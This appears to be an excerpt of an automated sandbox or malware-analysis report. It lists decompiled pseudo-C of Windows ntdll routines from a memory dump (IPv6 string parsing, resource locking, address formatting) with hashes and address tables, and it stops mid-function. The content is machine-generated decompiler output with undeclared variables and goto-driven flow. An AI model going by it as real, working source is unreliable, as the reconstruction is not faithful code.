                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: BaseDataModuleQuery
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 3901378454-484625025
                                          • Opcode ID: 044d6f474f1482a0d6dec39854c6285df212320c62ef0de0529cdd381fe2625d
                                          • Instruction ID: 440683af09293734900b73d0100c570b5dc56fa3a823cd56e0fdfcaffe620480
                                          • Opcode Fuzzy Hash: 044d6f474f1482a0d6dec39854c6285df212320c62ef0de0529cdd381fe2625d
                                          • Instruction Fuzzy Hash: 7E41977268032C7AEF30DA94DCC5FEBB3BDAB54704F0045A9E909E6181E770EA459F61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E02360B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				void* _t108;
                                          				void* _t116;
                                          				char _t120;
                                          				short _t121;
                                          				void* _t128;
                                          				intOrPtr* _t130;
                                          				char _t132;
                                          				short _t133;
                                          				intOrPtr _t141;
                                          				signed int _t156;
                                          				signed int _t174;
                                          				intOrPtr _t177;
                                          				intOrPtr* _t179;
                                          				intOrPtr _t180;
                                          				void* _t183;
                                          
                                          				_t179 = _a4;
                                          				_t141 =  *_t179;
                                          				_v16 = 0;
                                          				_v28 = 0;
                                          				_v8 = 0;
                                          				_v24 = 0;
                                          				_v12 = 0;
                                          				_v32 = 0;
                                          				_v20 = 0;
                                          				if(_t141 == 0) {
                                          					L41:
                                          					 *_a8 = _t179;
                                          					_t180 = _v24;
                                          					if(_t180 != 0) {
                                          						if(_t180 != 3) {
                                          							goto L6;
                                          						}
                                          						_v8 = _v8 + 1;
                                          					}
                                          					_t174 = _v32;
                                          					if(_t174 == 0) {
                                          						if(_v8 == 7) {
                                          							goto L43;
                                          						}
                                          						goto L6;
                                          					}
                                          					L43:
                                          					if(_v16 != 1) {
                                          						if(_v16 != 2) {
                                          							goto L6;
                                          						}
                                          						 *((short*)(_a12 + _v20 * 2)) = 0;
                                          						L47:
                                          						if(_t174 != 0) {
                                          							E02338980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                          							_t116 = 8;
                                          							E0232DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                          						}
                                          						return 0;
                                          					}
                                          					if(_t180 != 0) {
                                          						if(_v12 > 3) {
                                          							goto L6;
                                          						}
                                          						_t120 = E02360CFA(_v28, 0, 0xa);
                                          						_t183 = _t183 + 0xc;
                                          						if(_t120 > 0xff) {
                                          							goto L6;
                                          						}
                                          						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                          						goto L47;
                                          					}
                                          					if(_v12 > 4) {
                                          						goto L6;
                                          					}
                                          					_t121 = E02360CFA(_v28, _t180, 0x10);
                                          					_t183 = _t183 + 0xc;
                                          					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                          					goto L47;
                                          				} else {
                                          					while(1) {
                                          						_t123 = _v16;
                                          						if(_t123 == 0) {
                                          							goto L7;
                                          						}
                                          						_t108 = _t123 - 1;
                                          						if(_t108 != 0) {
                                          							goto L1;
                                          						}
                                          						_t178 = _t141;
                                          						if(E023606BA(_t108, _t141) == 0 || _t135 == 0) {
                                          							if(E023606BA(_t135, _t178) == 0 || E02360A5B(_t136, _t178) == 0) {
                                          								if(_t141 != 0x3a) {
                                          									if(_t141 == 0x2e) {
                                          										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                          											goto L41;
                                          										} else {
                                          											_v24 = _v24 + 1;
                                          											L27:
                                          											_v16 = _v16 & 0x00000000;
                                          											L28:
                                          											if(_v28 == 0) {
                                          												goto L20;
                                          											}
                                          											_t177 = _v24;
                                          											if(_t177 != 0) {
                                          												if(_v12 > 3) {
                                          													L6:
                                          													return 0xc000000d;
                                          												}
                                          												_t132 = E02360CFA(_v28, 0, 0xa);
                                          												_t183 = _t183 + 0xc;
                                          												if(_t132 > 0xff) {
                                          													goto L6;
                                          												}
                                          												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                          												goto L20;
                                          											}
                                          											if(_v12 > 4) {
                                          												goto L6;
                                          											}
                                          											_t133 = E02360CFA(_v28, 0, 0x10);
                                          											_t183 = _t183 + 0xc;
                                          											_v20 = _v20 + 1;
                                          											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                          											goto L20;
                                          										}
                                          									}
                                          									goto L41;
                                          								}
                                          								if(_v24 > 0 || _v8 > 6) {
                                          									goto L41;
                                          								} else {
                                          									_t130 = _t179 + 1;
                                          									if( *_t130 == _t141) {
                                          										if(_v32 != 0) {
                                          											goto L41;
                                          										}
                                          										_v32 = _v8 + 1;
                                          										_t156 = 2;
                                          										_v8 = _v8 + _t156;
                                          										L34:
                                          										_t179 = _t130;
                                          										_v16 = _t156;
                                          										goto L28;
                                          									}
                                          									_v8 = _v8 + 1;
                                          									goto L27;
                                          								}
                                          							} else {
                                          								_v12 = _v12 + 1;
                                          								if(_v24 > 0) {
                                          									goto L41;
                                          								}
                                          								_a7 = 1;
                                          								goto L20;
                                          							}
                                          						} else {
                                          							_v12 = _v12 + 1;
                                          							L20:
                                          							_t179 = _t179 + 1;
                                          							_t141 =  *_t179;
                                          							if(_t141 == 0) {
                                          								goto L41;
                                          							}
                                          							continue;
                                          						}
                                          						L7:
                                          						if(_t141 == 0x3a) {
                                          							if(_v24 > 0 || _v8 > 0) {
                                          								goto L41;
                                          							} else {
                                          								_t130 = _t179 + 1;
                                          								if( *_t130 != _t141) {
                                          									goto L41;
                                          								}
                                          								_v20 = _v20 + 1;
                                          								_t156 = 2;
                                          								_v32 = 1;
                                          								_v8 = _t156;
                                          								 *((short*)(_a12 + _v20 * 2)) = 0;
                                          								goto L34;
                                          							}
                                          						}
                                          						L8:
                                          						if(_v8 > 7) {
                                          							goto L41;
                                          						}
                                          						_t142 = _t141;
                                          						if(E023606BA(_t123, _t141) == 0 || _t124 == 0) {
                                          							if(E023606BA(_t124, _t142) == 0 || E02360A5B(_t125, _t142) == 0 || _v24 > 0) {
                                          								goto L41;
                                          							} else {
                                          								_t128 = 1;
                                          								_a7 = 1;
                                          								_v28 = _t179;
                                          								_v16 = 1;
                                          								_v12 = 1;
                                          								L39:
                                          								if(_v16 == _t128) {
                                          									goto L20;
                                          								}
                                          								goto L28;
                                          							}
                                          						} else {
                                          							_a7 = 0;
                                          							_v28 = _t179;
                                          							_v16 = 1;
                                          							_v12 = 1;
                                          							goto L20;
                                          						}
                                          					}
                                          				}
                                          				L1:
                                          				_t123 = _t108 == 1;
                                          				if(_t108 == 1) {
                                          					goto L8;
                                          				}
                                          				_t128 = 1;
                                          				goto L39;
                                          			}
                                          0x0238eae3
                                          0x00000000
                                          0x00000000
                                          0x0238eaf3
                                          0x0238eaf6
                                          0x0238eaf7
                                          0x0238eafe
                                          0x0238eb01
                                          0x00000000
                                          0x0238eb01
                                          0x0238eacf
                                          0x02360ad0
                                          0x02360ad4
                                          0x00000000
                                          0x00000000
                                          0x02360ada
                                          0x02360ae6
                                          0x02360c34
                                          0x00000000
                                          0x02360c47
                                          0x02360c49
                                          0x02360c4a
                                          0x02360c4e
                                          0x02360c51
                                          0x02360c54
                                          0x02360c57
                                          0x02360c5a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x02360c60
                                          0x02360afb
                                          0x02360afe
                                          0x02360b02
                                          0x02360b05
                                          0x02360b08
                                          0x00000000
                                          0x02360b08
                                          0x02360ae6
                                          0x02360b44
                                          0x023609f8
                                          0x023609f8
                                          0x023609f9
                                          0x00000000
                                          0x00000000
                                          0x0238eaa0
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: __fassign
                                          • String ID: .$:$:
                                          • API String ID: 3965848254-2308638275
                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction ID: ea3950c6513d2e1a8d61c26bc86e50159c82a53911e1305b494c694a851064f3
                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction Fuzzy Hash: 46A1A071D0420ADECF28DF54C84A7BEB7BEBF05308F24C46AD452AB24AD7319659CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 49%
                                          			E02360554(signed int _a4, char _a8) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int* _t49;
                                          				signed int _t51;
                                          				signed int _t56;
                                          				signed int _t58;
                                          				signed int _t61;
                                          				signed int _t63;
                                          				void* _t66;
                                          				intOrPtr _t67;
                                          				signed int _t70;
                                          				void* _t75;
                                          				signed int _t81;
                                          				signed int _t84;
                                          				void* _t86;
                                          				signed int _t93;
                                          				signed int _t96;
                                          				intOrPtr _t105;
                                          				signed int _t107;
                                          				void* _t110;
                                          				signed int _t115;
                                          				signed int* _t119;
                                          				void* _t125;
                                          				void* _t126;
                                          				signed int _t128;
                                          				signed int _t130;
                                          				signed int _t138;
                                          				signed int _t144;
                                          				void* _t158;
                                          				void* _t159;
                                          				void* _t160;
                                          
                                          				_t96 = _a4;
                                          				_t115 =  *(_t96 + 0x28);
                                          				_push(_t138);
                                          				if(_t115 < 0) {
                                          					_t105 =  *[fs:0x18];
                                          					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                          					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                          						goto L6;
                                          					} else {
                                          						__eflags = _t115 | 0xffffffff;
                                          						asm("lock xadd [eax], edx");
                                          						return 1;
                                          					}
                                          				} else {
                                          					L6:
                                          					_push(_t128);
                                          					while(1) {
                                          						L7:
                                          						__eflags = _t115;
                                          						if(_t115 >= 0) {
                                          							break;
                                          						}
                                          						__eflags = _a8;
                                          						if(_a8 == 0) {
                                          							__eflags = 0;
                                          							return 0;
                                          						} else {
                                          							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                          							_t49 = _t96 + 0x1c;
                                          							_t106 = 1;
                                          							asm("lock xadd [edx], ecx");
                                          							_t115 =  *(_t96 + 0x28);
                                          							__eflags = _t115;
                                          							if(_t115 < 0) {
                                          								L23:
                                          								_t130 = 0;
                                          								__eflags = 0;
                                          								while(1) {
                                          									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                          									asm("sbb esi, esi");
                                          									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x024001c0;
                                          									_push(_t144);
                                          									_push(0);
                                          									_t51 = E0231F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                          									__eflags = _t51 - 0x102;
                                          									if(_t51 != 0x102) {
                                          										break;
                                          									}
                                          									_t106 =  *(_t144 + 4);
                                          									_t126 =  *_t144;
                                          									_t86 = E02364FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                          									_push(_t126);
                                          									_push(_t86);
                                          									E02373F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                          									E02373F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                          									_t130 = _t130 + 1;
                                          									_t160 = _t158 + 0x28;
                                          									__eflags = _t130 - 2;
                                          									if(__eflags > 0) {
                                          										E023A217A(_t106, __eflags, _t96);
                                          									}
                                          									_push("RTL: Re-Waiting\n");
                                          									_push(0);
                                          									_push(0x65);
                                          									E02373F92();
                                          									_t158 = _t160 + 0xc;
                                          								}
                                          								__eflags = _t51;
                                          								if(__eflags < 0) {
                                          									_push(_t51);
                                          									E02363915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                          									asm("int3");
                                          									while(1) {
                                          										L32:
                                          										__eflags = _a8;
                                          										if(_a8 == 0) {
                                          											break;
                                          										}
                                          										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                          										_t119 = _t96 + 0x24;
                                          										_t107 = 1;
                                          										asm("lock xadd [eax], ecx");
                                          										_t56 =  *(_t96 + 0x28);
                                          										_a4 = _t56;
                                          										__eflags = _t56;
                                          										if(_t56 != 0) {
                                          											L40:
                                          											_t128 = 0;
                                          											__eflags = 0;
                                          											while(1) {
                                          												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                          												asm("sbb esi, esi");
                                          												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x024001c0;
                                          												_push(_t138);
                                          												_push(0);
                                          												_t58 = E0231F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                          												__eflags = _t58 - 0x102;
                                          												if(_t58 != 0x102) {
                                          													break;
                                          												}
                                          												_t107 =  *(_t138 + 4);
                                          												_t125 =  *_t138;
                                          												_t75 = E02364FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                          												_push(_t125);
                                          												_push(_t75);
                                          												E02373F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                          												E02373F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                          												_t128 = _t128 + 1;
                                          												_t159 = _t158 + 0x28;
                                          												__eflags = _t128 - 2;
                                          												if(__eflags > 0) {
                                          													E023A217A(_t107, __eflags, _t96);
                                          												}
                                          												_push("RTL: Re-Waiting\n");
                                          												_push(0);
                                          												_push(0x65);
                                          												E02373F92();
                                          												_t158 = _t159 + 0xc;
                                          											}
                                          											__eflags = _t58;
                                          											if(__eflags < 0) {
                                          												_push(_t58);
                                          												E02363915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                          												asm("int3");
                                          												_t61 =  *_t107;
                                          												 *_t107 = 0;
                                          												__eflags = _t61;
                                          												if(_t61 == 0) {
                                          													L1:
                                          													_t63 = E02345384(_t138 + 0x24);
                                          													if(_t63 != 0) {
                                          														goto L52;
                                          													} else {
                                          														goto L2;
                                          													}
                                          												} else {
                                          													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                          													_push( &_a4);
                                          													_push(_t61);
                                          													_t70 = E0231F970( *((intOrPtr*)(_t138 + 0x18)));
                                          													__eflags = _t70;
                                          													if(__eflags >= 0) {
                                          														goto L1;
                                          													} else {
                                          														_push(_t70);
                                          														E02363915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                          														L52:
                                          														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                          														_push( &_a4);
                                          														_push(1);
                                          														_t63 = E0231F970( *((intOrPtr*)(_t138 + 0x20)));
                                          														__eflags = _t63;
                                          														if(__eflags >= 0) {
                                          															L2:
                                          															return _t63;
                                          														} else {
                                          															_push(_t63);
                                          															E02363915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                          															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                          															_push( &_a4);
                                          															_push(1);
                                          															_t63 = E0231F970( *((intOrPtr*)(_t138 + 0x20)));
                                          															__eflags = _t63;
                                          															if(__eflags >= 0) {
                                          																goto L2;
                                          															} else {
                                          																_push(_t63);
                                          																_t66 = E02363915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                          																asm("int3");
                                          																while(1) {
                                          																	_t110 = _t66;
                                          																	__eflags = _t66 - 1;
                                          																	if(_t66 != 1) {
                                          																		break;
                                          																	}
                                          																	_t128 = _t128 | 0xffffffff;
                                          																	_t66 = _t110;
                                          																	asm("lock cmpxchg [ebx], edi");
                                          																	__eflags = _t66 - _t110;
                                          																	if(_t66 != _t110) {
                                          																		continue;
                                          																	} else {
                                          																		_t67 =  *[fs:0x18];
                                          																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                          																		return _t67;
                                          																	}
                                          																	goto L58;
                                          																}
                                          																E02345329(_t110, _t138);
                                          																return E023453A5(_t138, 1);
                                          															}
                                          														}
                                          													}
                                          												}
                                          											} else {
                                          												_t56 =  *(_t96 + 0x28);
                                          												goto L3;
                                          											}
                                          										} else {
                                          											_t107 =  *_t119;
                                          											__eflags = _t107;
                                          											if(__eflags > 0) {
                                          												while(1) {
                                          													_t81 = _t107;
                                          													asm("lock cmpxchg [edi], esi");
                                          													__eflags = _t81 - _t107;
                                          													if(_t81 == _t107) {
                                          														break;
                                          													}
                                          													_t107 = _t81;
                                          													__eflags = _t81;
                                          													if(_t81 > 0) {
                                          														continue;
                                          													}
                                          													break;
                                          												}
                                          												_t56 = _a4;
                                          												__eflags = _t107;
                                          											}
                                          											if(__eflags != 0) {
                                          												while(1) {
                                          													L3:
                                          													__eflags = _t56;
                                          													if(_t56 != 0) {
                                          														goto L32;
                                          													}
                                          													_t107 = _t107 | 0xffffffff;
                                          													_t56 = 0;
                                          													asm("lock cmpxchg [edx], ecx");
                                          													__eflags = 0;
                                          													if(0 != 0) {
                                          														continue;
                                          													} else {
                                          														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                          														return 1;
                                          													}
                                          													goto L58;
                                          												}
                                          												continue;
                                          											} else {
                                          												goto L40;
                                          											}
                                          										}
                                          										goto L58;
                                          									}
                                          									__eflags = 0;
                                          									return 0;
                                          								} else {
                                          									_t115 =  *(_t96 + 0x28);
                                          									continue;
                                          								}
                                          							} else {
                                          								_t106 =  *_t49;
                                          								__eflags = _t106;
                                          								if(__eflags > 0) {
                                          									while(1) {
                                          										_t93 = _t106;
                                          										asm("lock cmpxchg [edi], esi");
                                          										__eflags = _t93 - _t106;
                                          										if(_t93 == _t106) {
                                          											break;
                                          										}
                                          										_t106 = _t93;
                                          										__eflags = _t93;
                                          										if(_t93 > 0) {
                                          											continue;
                                          										}
                                          										break;
                                          									}
                                          									__eflags = _t106;
                                          								}
                                          								if(__eflags != 0) {
                                          									continue;
                                          								} else {
                                          									goto L23;
                                          								}
                                          							}
                                          						}
                                          						goto L58;
                                          					}
                                          					_t84 = _t115;
                                          					asm("lock cmpxchg [esi], ecx");
                                          					__eflags = _t84 - _t115;
                                          					if(_t84 != _t115) {
                                          						_t115 = _t84;
                                          						goto L7;
                                          					} else {
                                          						return 1;
                                          					}
                                          				}
                                          				L58:
                                          			}



































                                          0x023822bc
                                          0x023822bc
                                          0x023822bc
                                          0x023822be
                                          0x023822c4
                                          0x023822cc
                                          0x023822d0
                                          0x023822d6
                                          0x023822d7
                                          0x023822da
                                          0x023822df
                                          0x023822e4
                                          0x00000000
                                          0x00000000
                                          0x023822e6
                                          0x023822e9
                                          0x023822f4
                                          0x023822f9
                                          0x023822fa
                                          0x02382305
                                          0x02382314
                                          0x02382319
                                          0x0238231a
                                          0x0238231d
                                          0x02382320
                                          0x02382323
                                          0x02382323
                                          0x02382328
                                          0x0238232d
                                          0x0238232f
                                          0x02382331
                                          0x02382336
                                          0x02382336
                                          0x0238233b
                                          0x0238233d
                                          0x02382350
                                          0x02382351
                                          0x02382356
                                          0x02382359
                                          0x02382359
                                          0x0238235b
                                          0x0238235d
                                          0x02345367
                                          0x0234536b
                                          0x02345372
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x02382363
                                          0x02382363
                                          0x02382369
                                          0x0238236a
                                          0x0238236c
                                          0x02382371
                                          0x02382373
                                          0x00000000
                                          0x02382379
                                          0x02382379
                                          0x0238237a
                                          0x0238237f
                                          0x0238237f
                                          0x02382385
                                          0x02382386
                                          0x02382389
                                          0x0238238e
                                          0x02382390
                                          0x02345378
                                          0x0234537c
                                          0x02382396
                                          0x02382396
                                          0x02382397
                                          0x0238239c
                                          0x023823a2
                                          0x023823a3
                                          0x023823a6
                                          0x023823ab
                                          0x023823ad
                                          0x00000000
                                          0x023823b3
                                          0x023823b3
                                          0x023823b4
                                          0x023823b9
                                          0x023823ba
                                          0x023823ba
                                          0x023823bc
                                          0x023823bf
                                          0x00000000
                                          0x00000000
                                          0x02379153
                                          0x02379158
                                          0x0237915a
                                          0x0237915e
                                          0x02379160
                                          0x00000000
                                          0x02379166
                                          0x02379166
                                          0x02379171
                                          0x02379176
                                          0x02379176
                                          0x00000000
                                          0x02379160
                                          0x023823c6
                                          0x023823d7
                                          0x023823d7
                                          0x023823ad
                                          0x02382390
                                          0x02382373
                                          0x0238233f
                                          0x0238233f
                                          0x00000000
                                          0x0238233f
                                          0x02382291
                                          0x02382291
                                          0x02382293
                                          0x02382295
                                          0x0238229a
                                          0x023822a1
                                          0x023822a3
                                          0x023822a7
                                          0x023822a9
                                          0x00000000
                                          0x00000000
                                          0x023822ab
                                          0x023822ad
                                          0x023822af
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023822af
                                          0x023822b1
                                          0x023822b4
                                          0x023822b4
                                          0x023822b6
                                          0x023453be
                                          0x023453be
                                          0x023453be
                                          0x023453c0
                                          0x00000000
                                          0x00000000
                                          0x023453cb
                                          0x023453ce
                                          0x023453d0
                                          0x023453d4
                                          0x023453d6
                                          0x00000000
                                          0x023453d8
                                          0x023453e3
                                          0x023453ea
                                          0x023453ea
                                          0x00000000
                                          0x023453d6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023822b6
                                          0x00000000
                                          0x0238228f
                                          0x02382349
                                          0x0238234d
                                          0x02382251
                                          0x02382251
                                          0x00000000
                                          0x02382251
                                          0x023821a4
                                          0x023821a4
                                          0x023821a6
                                          0x023821a8
                                          0x023821ac
                                          0x023821b6
                                          0x023821b8
                                          0x023821bc
                                          0x023821be
                                          0x00000000
                                          0x00000000
                                          0x023821c0
                                          0x023821c2
                                          0x023821c4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023821c4
                                          0x023821c6
                                          0x023821c6
                                          0x023821c8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023821c8
                                          0x023821a2
                                          0x00000000
                                          0x02382183
                                          0x0236057b
                                          0x0236057d
                                          0x02360581
                                          0x02360583
                                          0x02382178
                                          0x00000000
                                          0x02360589
                                          0x0236058f
                                          0x0236058f
                                          0x02360583
                                          0x00000000

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02382206
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-4236105082
                                          • Opcode ID: 9137f8bf9f33e897ed80c0bdd59991b54fc5c195d303e4f75df23ee6edc921df
                                          • Instruction ID: f7f6936a1c12b2a5257e859e700f88051765e725b677b843b860b6e8c45a64dd
                                          • Opcode Fuzzy Hash: 9137f8bf9f33e897ed80c0bdd59991b54fc5c195d303e4f75df23ee6edc921df
                                          • Instruction Fuzzy Hash: BB5138717003516FEB25DE18CC81FA733AAAF88720F218269FD55DF285DA71EC428B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E023614C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                          				signed int _v8;
                                          				char _v10;
                                          				char _v140;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t24;
                                          				void* _t26;
                                          				signed int _t29;
                                          				signed int _t34;
                                          				signed int _t40;
                                          				intOrPtr _t45;
                                          				void* _t51;
                                          				intOrPtr* _t52;
                                          				void* _t54;
                                          				signed int _t57;
                                          				void* _t58;
                                          
                                          				_t51 = __edx;
                                          				_t24 =  *0x2402088; // 0x76a365d9
                                          				_v8 = _t24 ^ _t57;
                                          				_t45 = _a16;
                                          				_t53 = _a4;
                                          				_t52 = _a20;
                                          				if(_a4 == 0 || _t52 == 0) {
                                          					L10:
                                          					_t26 = 0xc000000d;
                                          				} else {
                                          					if(_t45 == 0) {
                                          						if( *_t52 == _t45) {
                                          							goto L3;
                                          						} else {
                                          							goto L10;
                                          						}
                                          					} else {
                                          						L3:
                                          						_t28 =  &_v140;
                                          						if(_a12 != 0) {
                                          							_push("[");
                                          							_push(0x41);
                                          							_push( &_v140);
                                          							_t29 = E02357707();
                                          							_t58 = _t58 + 0xc;
                                          							_t28 = _t57 + _t29 * 2 - 0x88;
                                          						}
                                          						_t54 = E023613CB(_t53, _t28);
                                          						if(_a8 != 0) {
                                          							_t34 = E02357707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                          							_t58 = _t58 + 0x10;
                                          							_t54 = _t54 + _t34 * 2;
                                          						}
                                          						if(_a12 != 0) {
                                          							_t40 = E02357707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                          							_t58 = _t58 + 0x10;
                                          							_t54 = _t54 + _t40 * 2;
                                          						}
                                          						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                          						 *_t52 = _t53;
                                          						if( *_t52 < _t53) {
                                          							goto L10;
                                          						} else {
                                          							E02322340(_t45,  &_v140, _t53 + _t53);
                                          							_t26 = 0;
                                          						}
                                          					}
                                          				}
                                          				return E0232E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                          			}





















                                          APIs
                                          • ___swprintf_l.LIBCMT ref: 0238EA22
                                            • Part of subcall function 023613CB: ___swprintf_l.LIBCMT ref: 0236146B
                                            • Part of subcall function 023613CB: ___swprintf_l.LIBCMT ref: 02361490
                                          • ___swprintf_l.LIBCMT ref: 0236156D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: ad30bda190c673fbd081c5a760953fa86d5686675c3a7ef29c00445c94af9eda
                                          • Instruction ID: 5e7f915459e9b8b2e78ec4566a3e576cc4af557ccb4ffefcd3842349fec8c44c
                                          • Opcode Fuzzy Hash: ad30bda190c673fbd081c5a760953fa86d5686675c3a7ef29c00445c94af9eda
                                          • Instruction Fuzzy Hash: 5E21C3729002299BDB20EE54DC49AFEB3ACEB50704F448056ED8AD3244DB70EA588FE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E023453A5(signed int _a4, char _a8) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t32;
                                          				signed int _t37;
                                          				signed int _t40;
                                          				signed int _t42;
                                          				void* _t45;
                                          				intOrPtr _t46;
                                          				signed int _t49;
                                          				void* _t51;
                                          				signed int _t57;
                                          				signed int _t64;
                                          				signed int _t71;
                                          				void* _t74;
                                          				intOrPtr _t78;
                                          				signed int* _t79;
                                          				void* _t85;
                                          				signed int _t86;
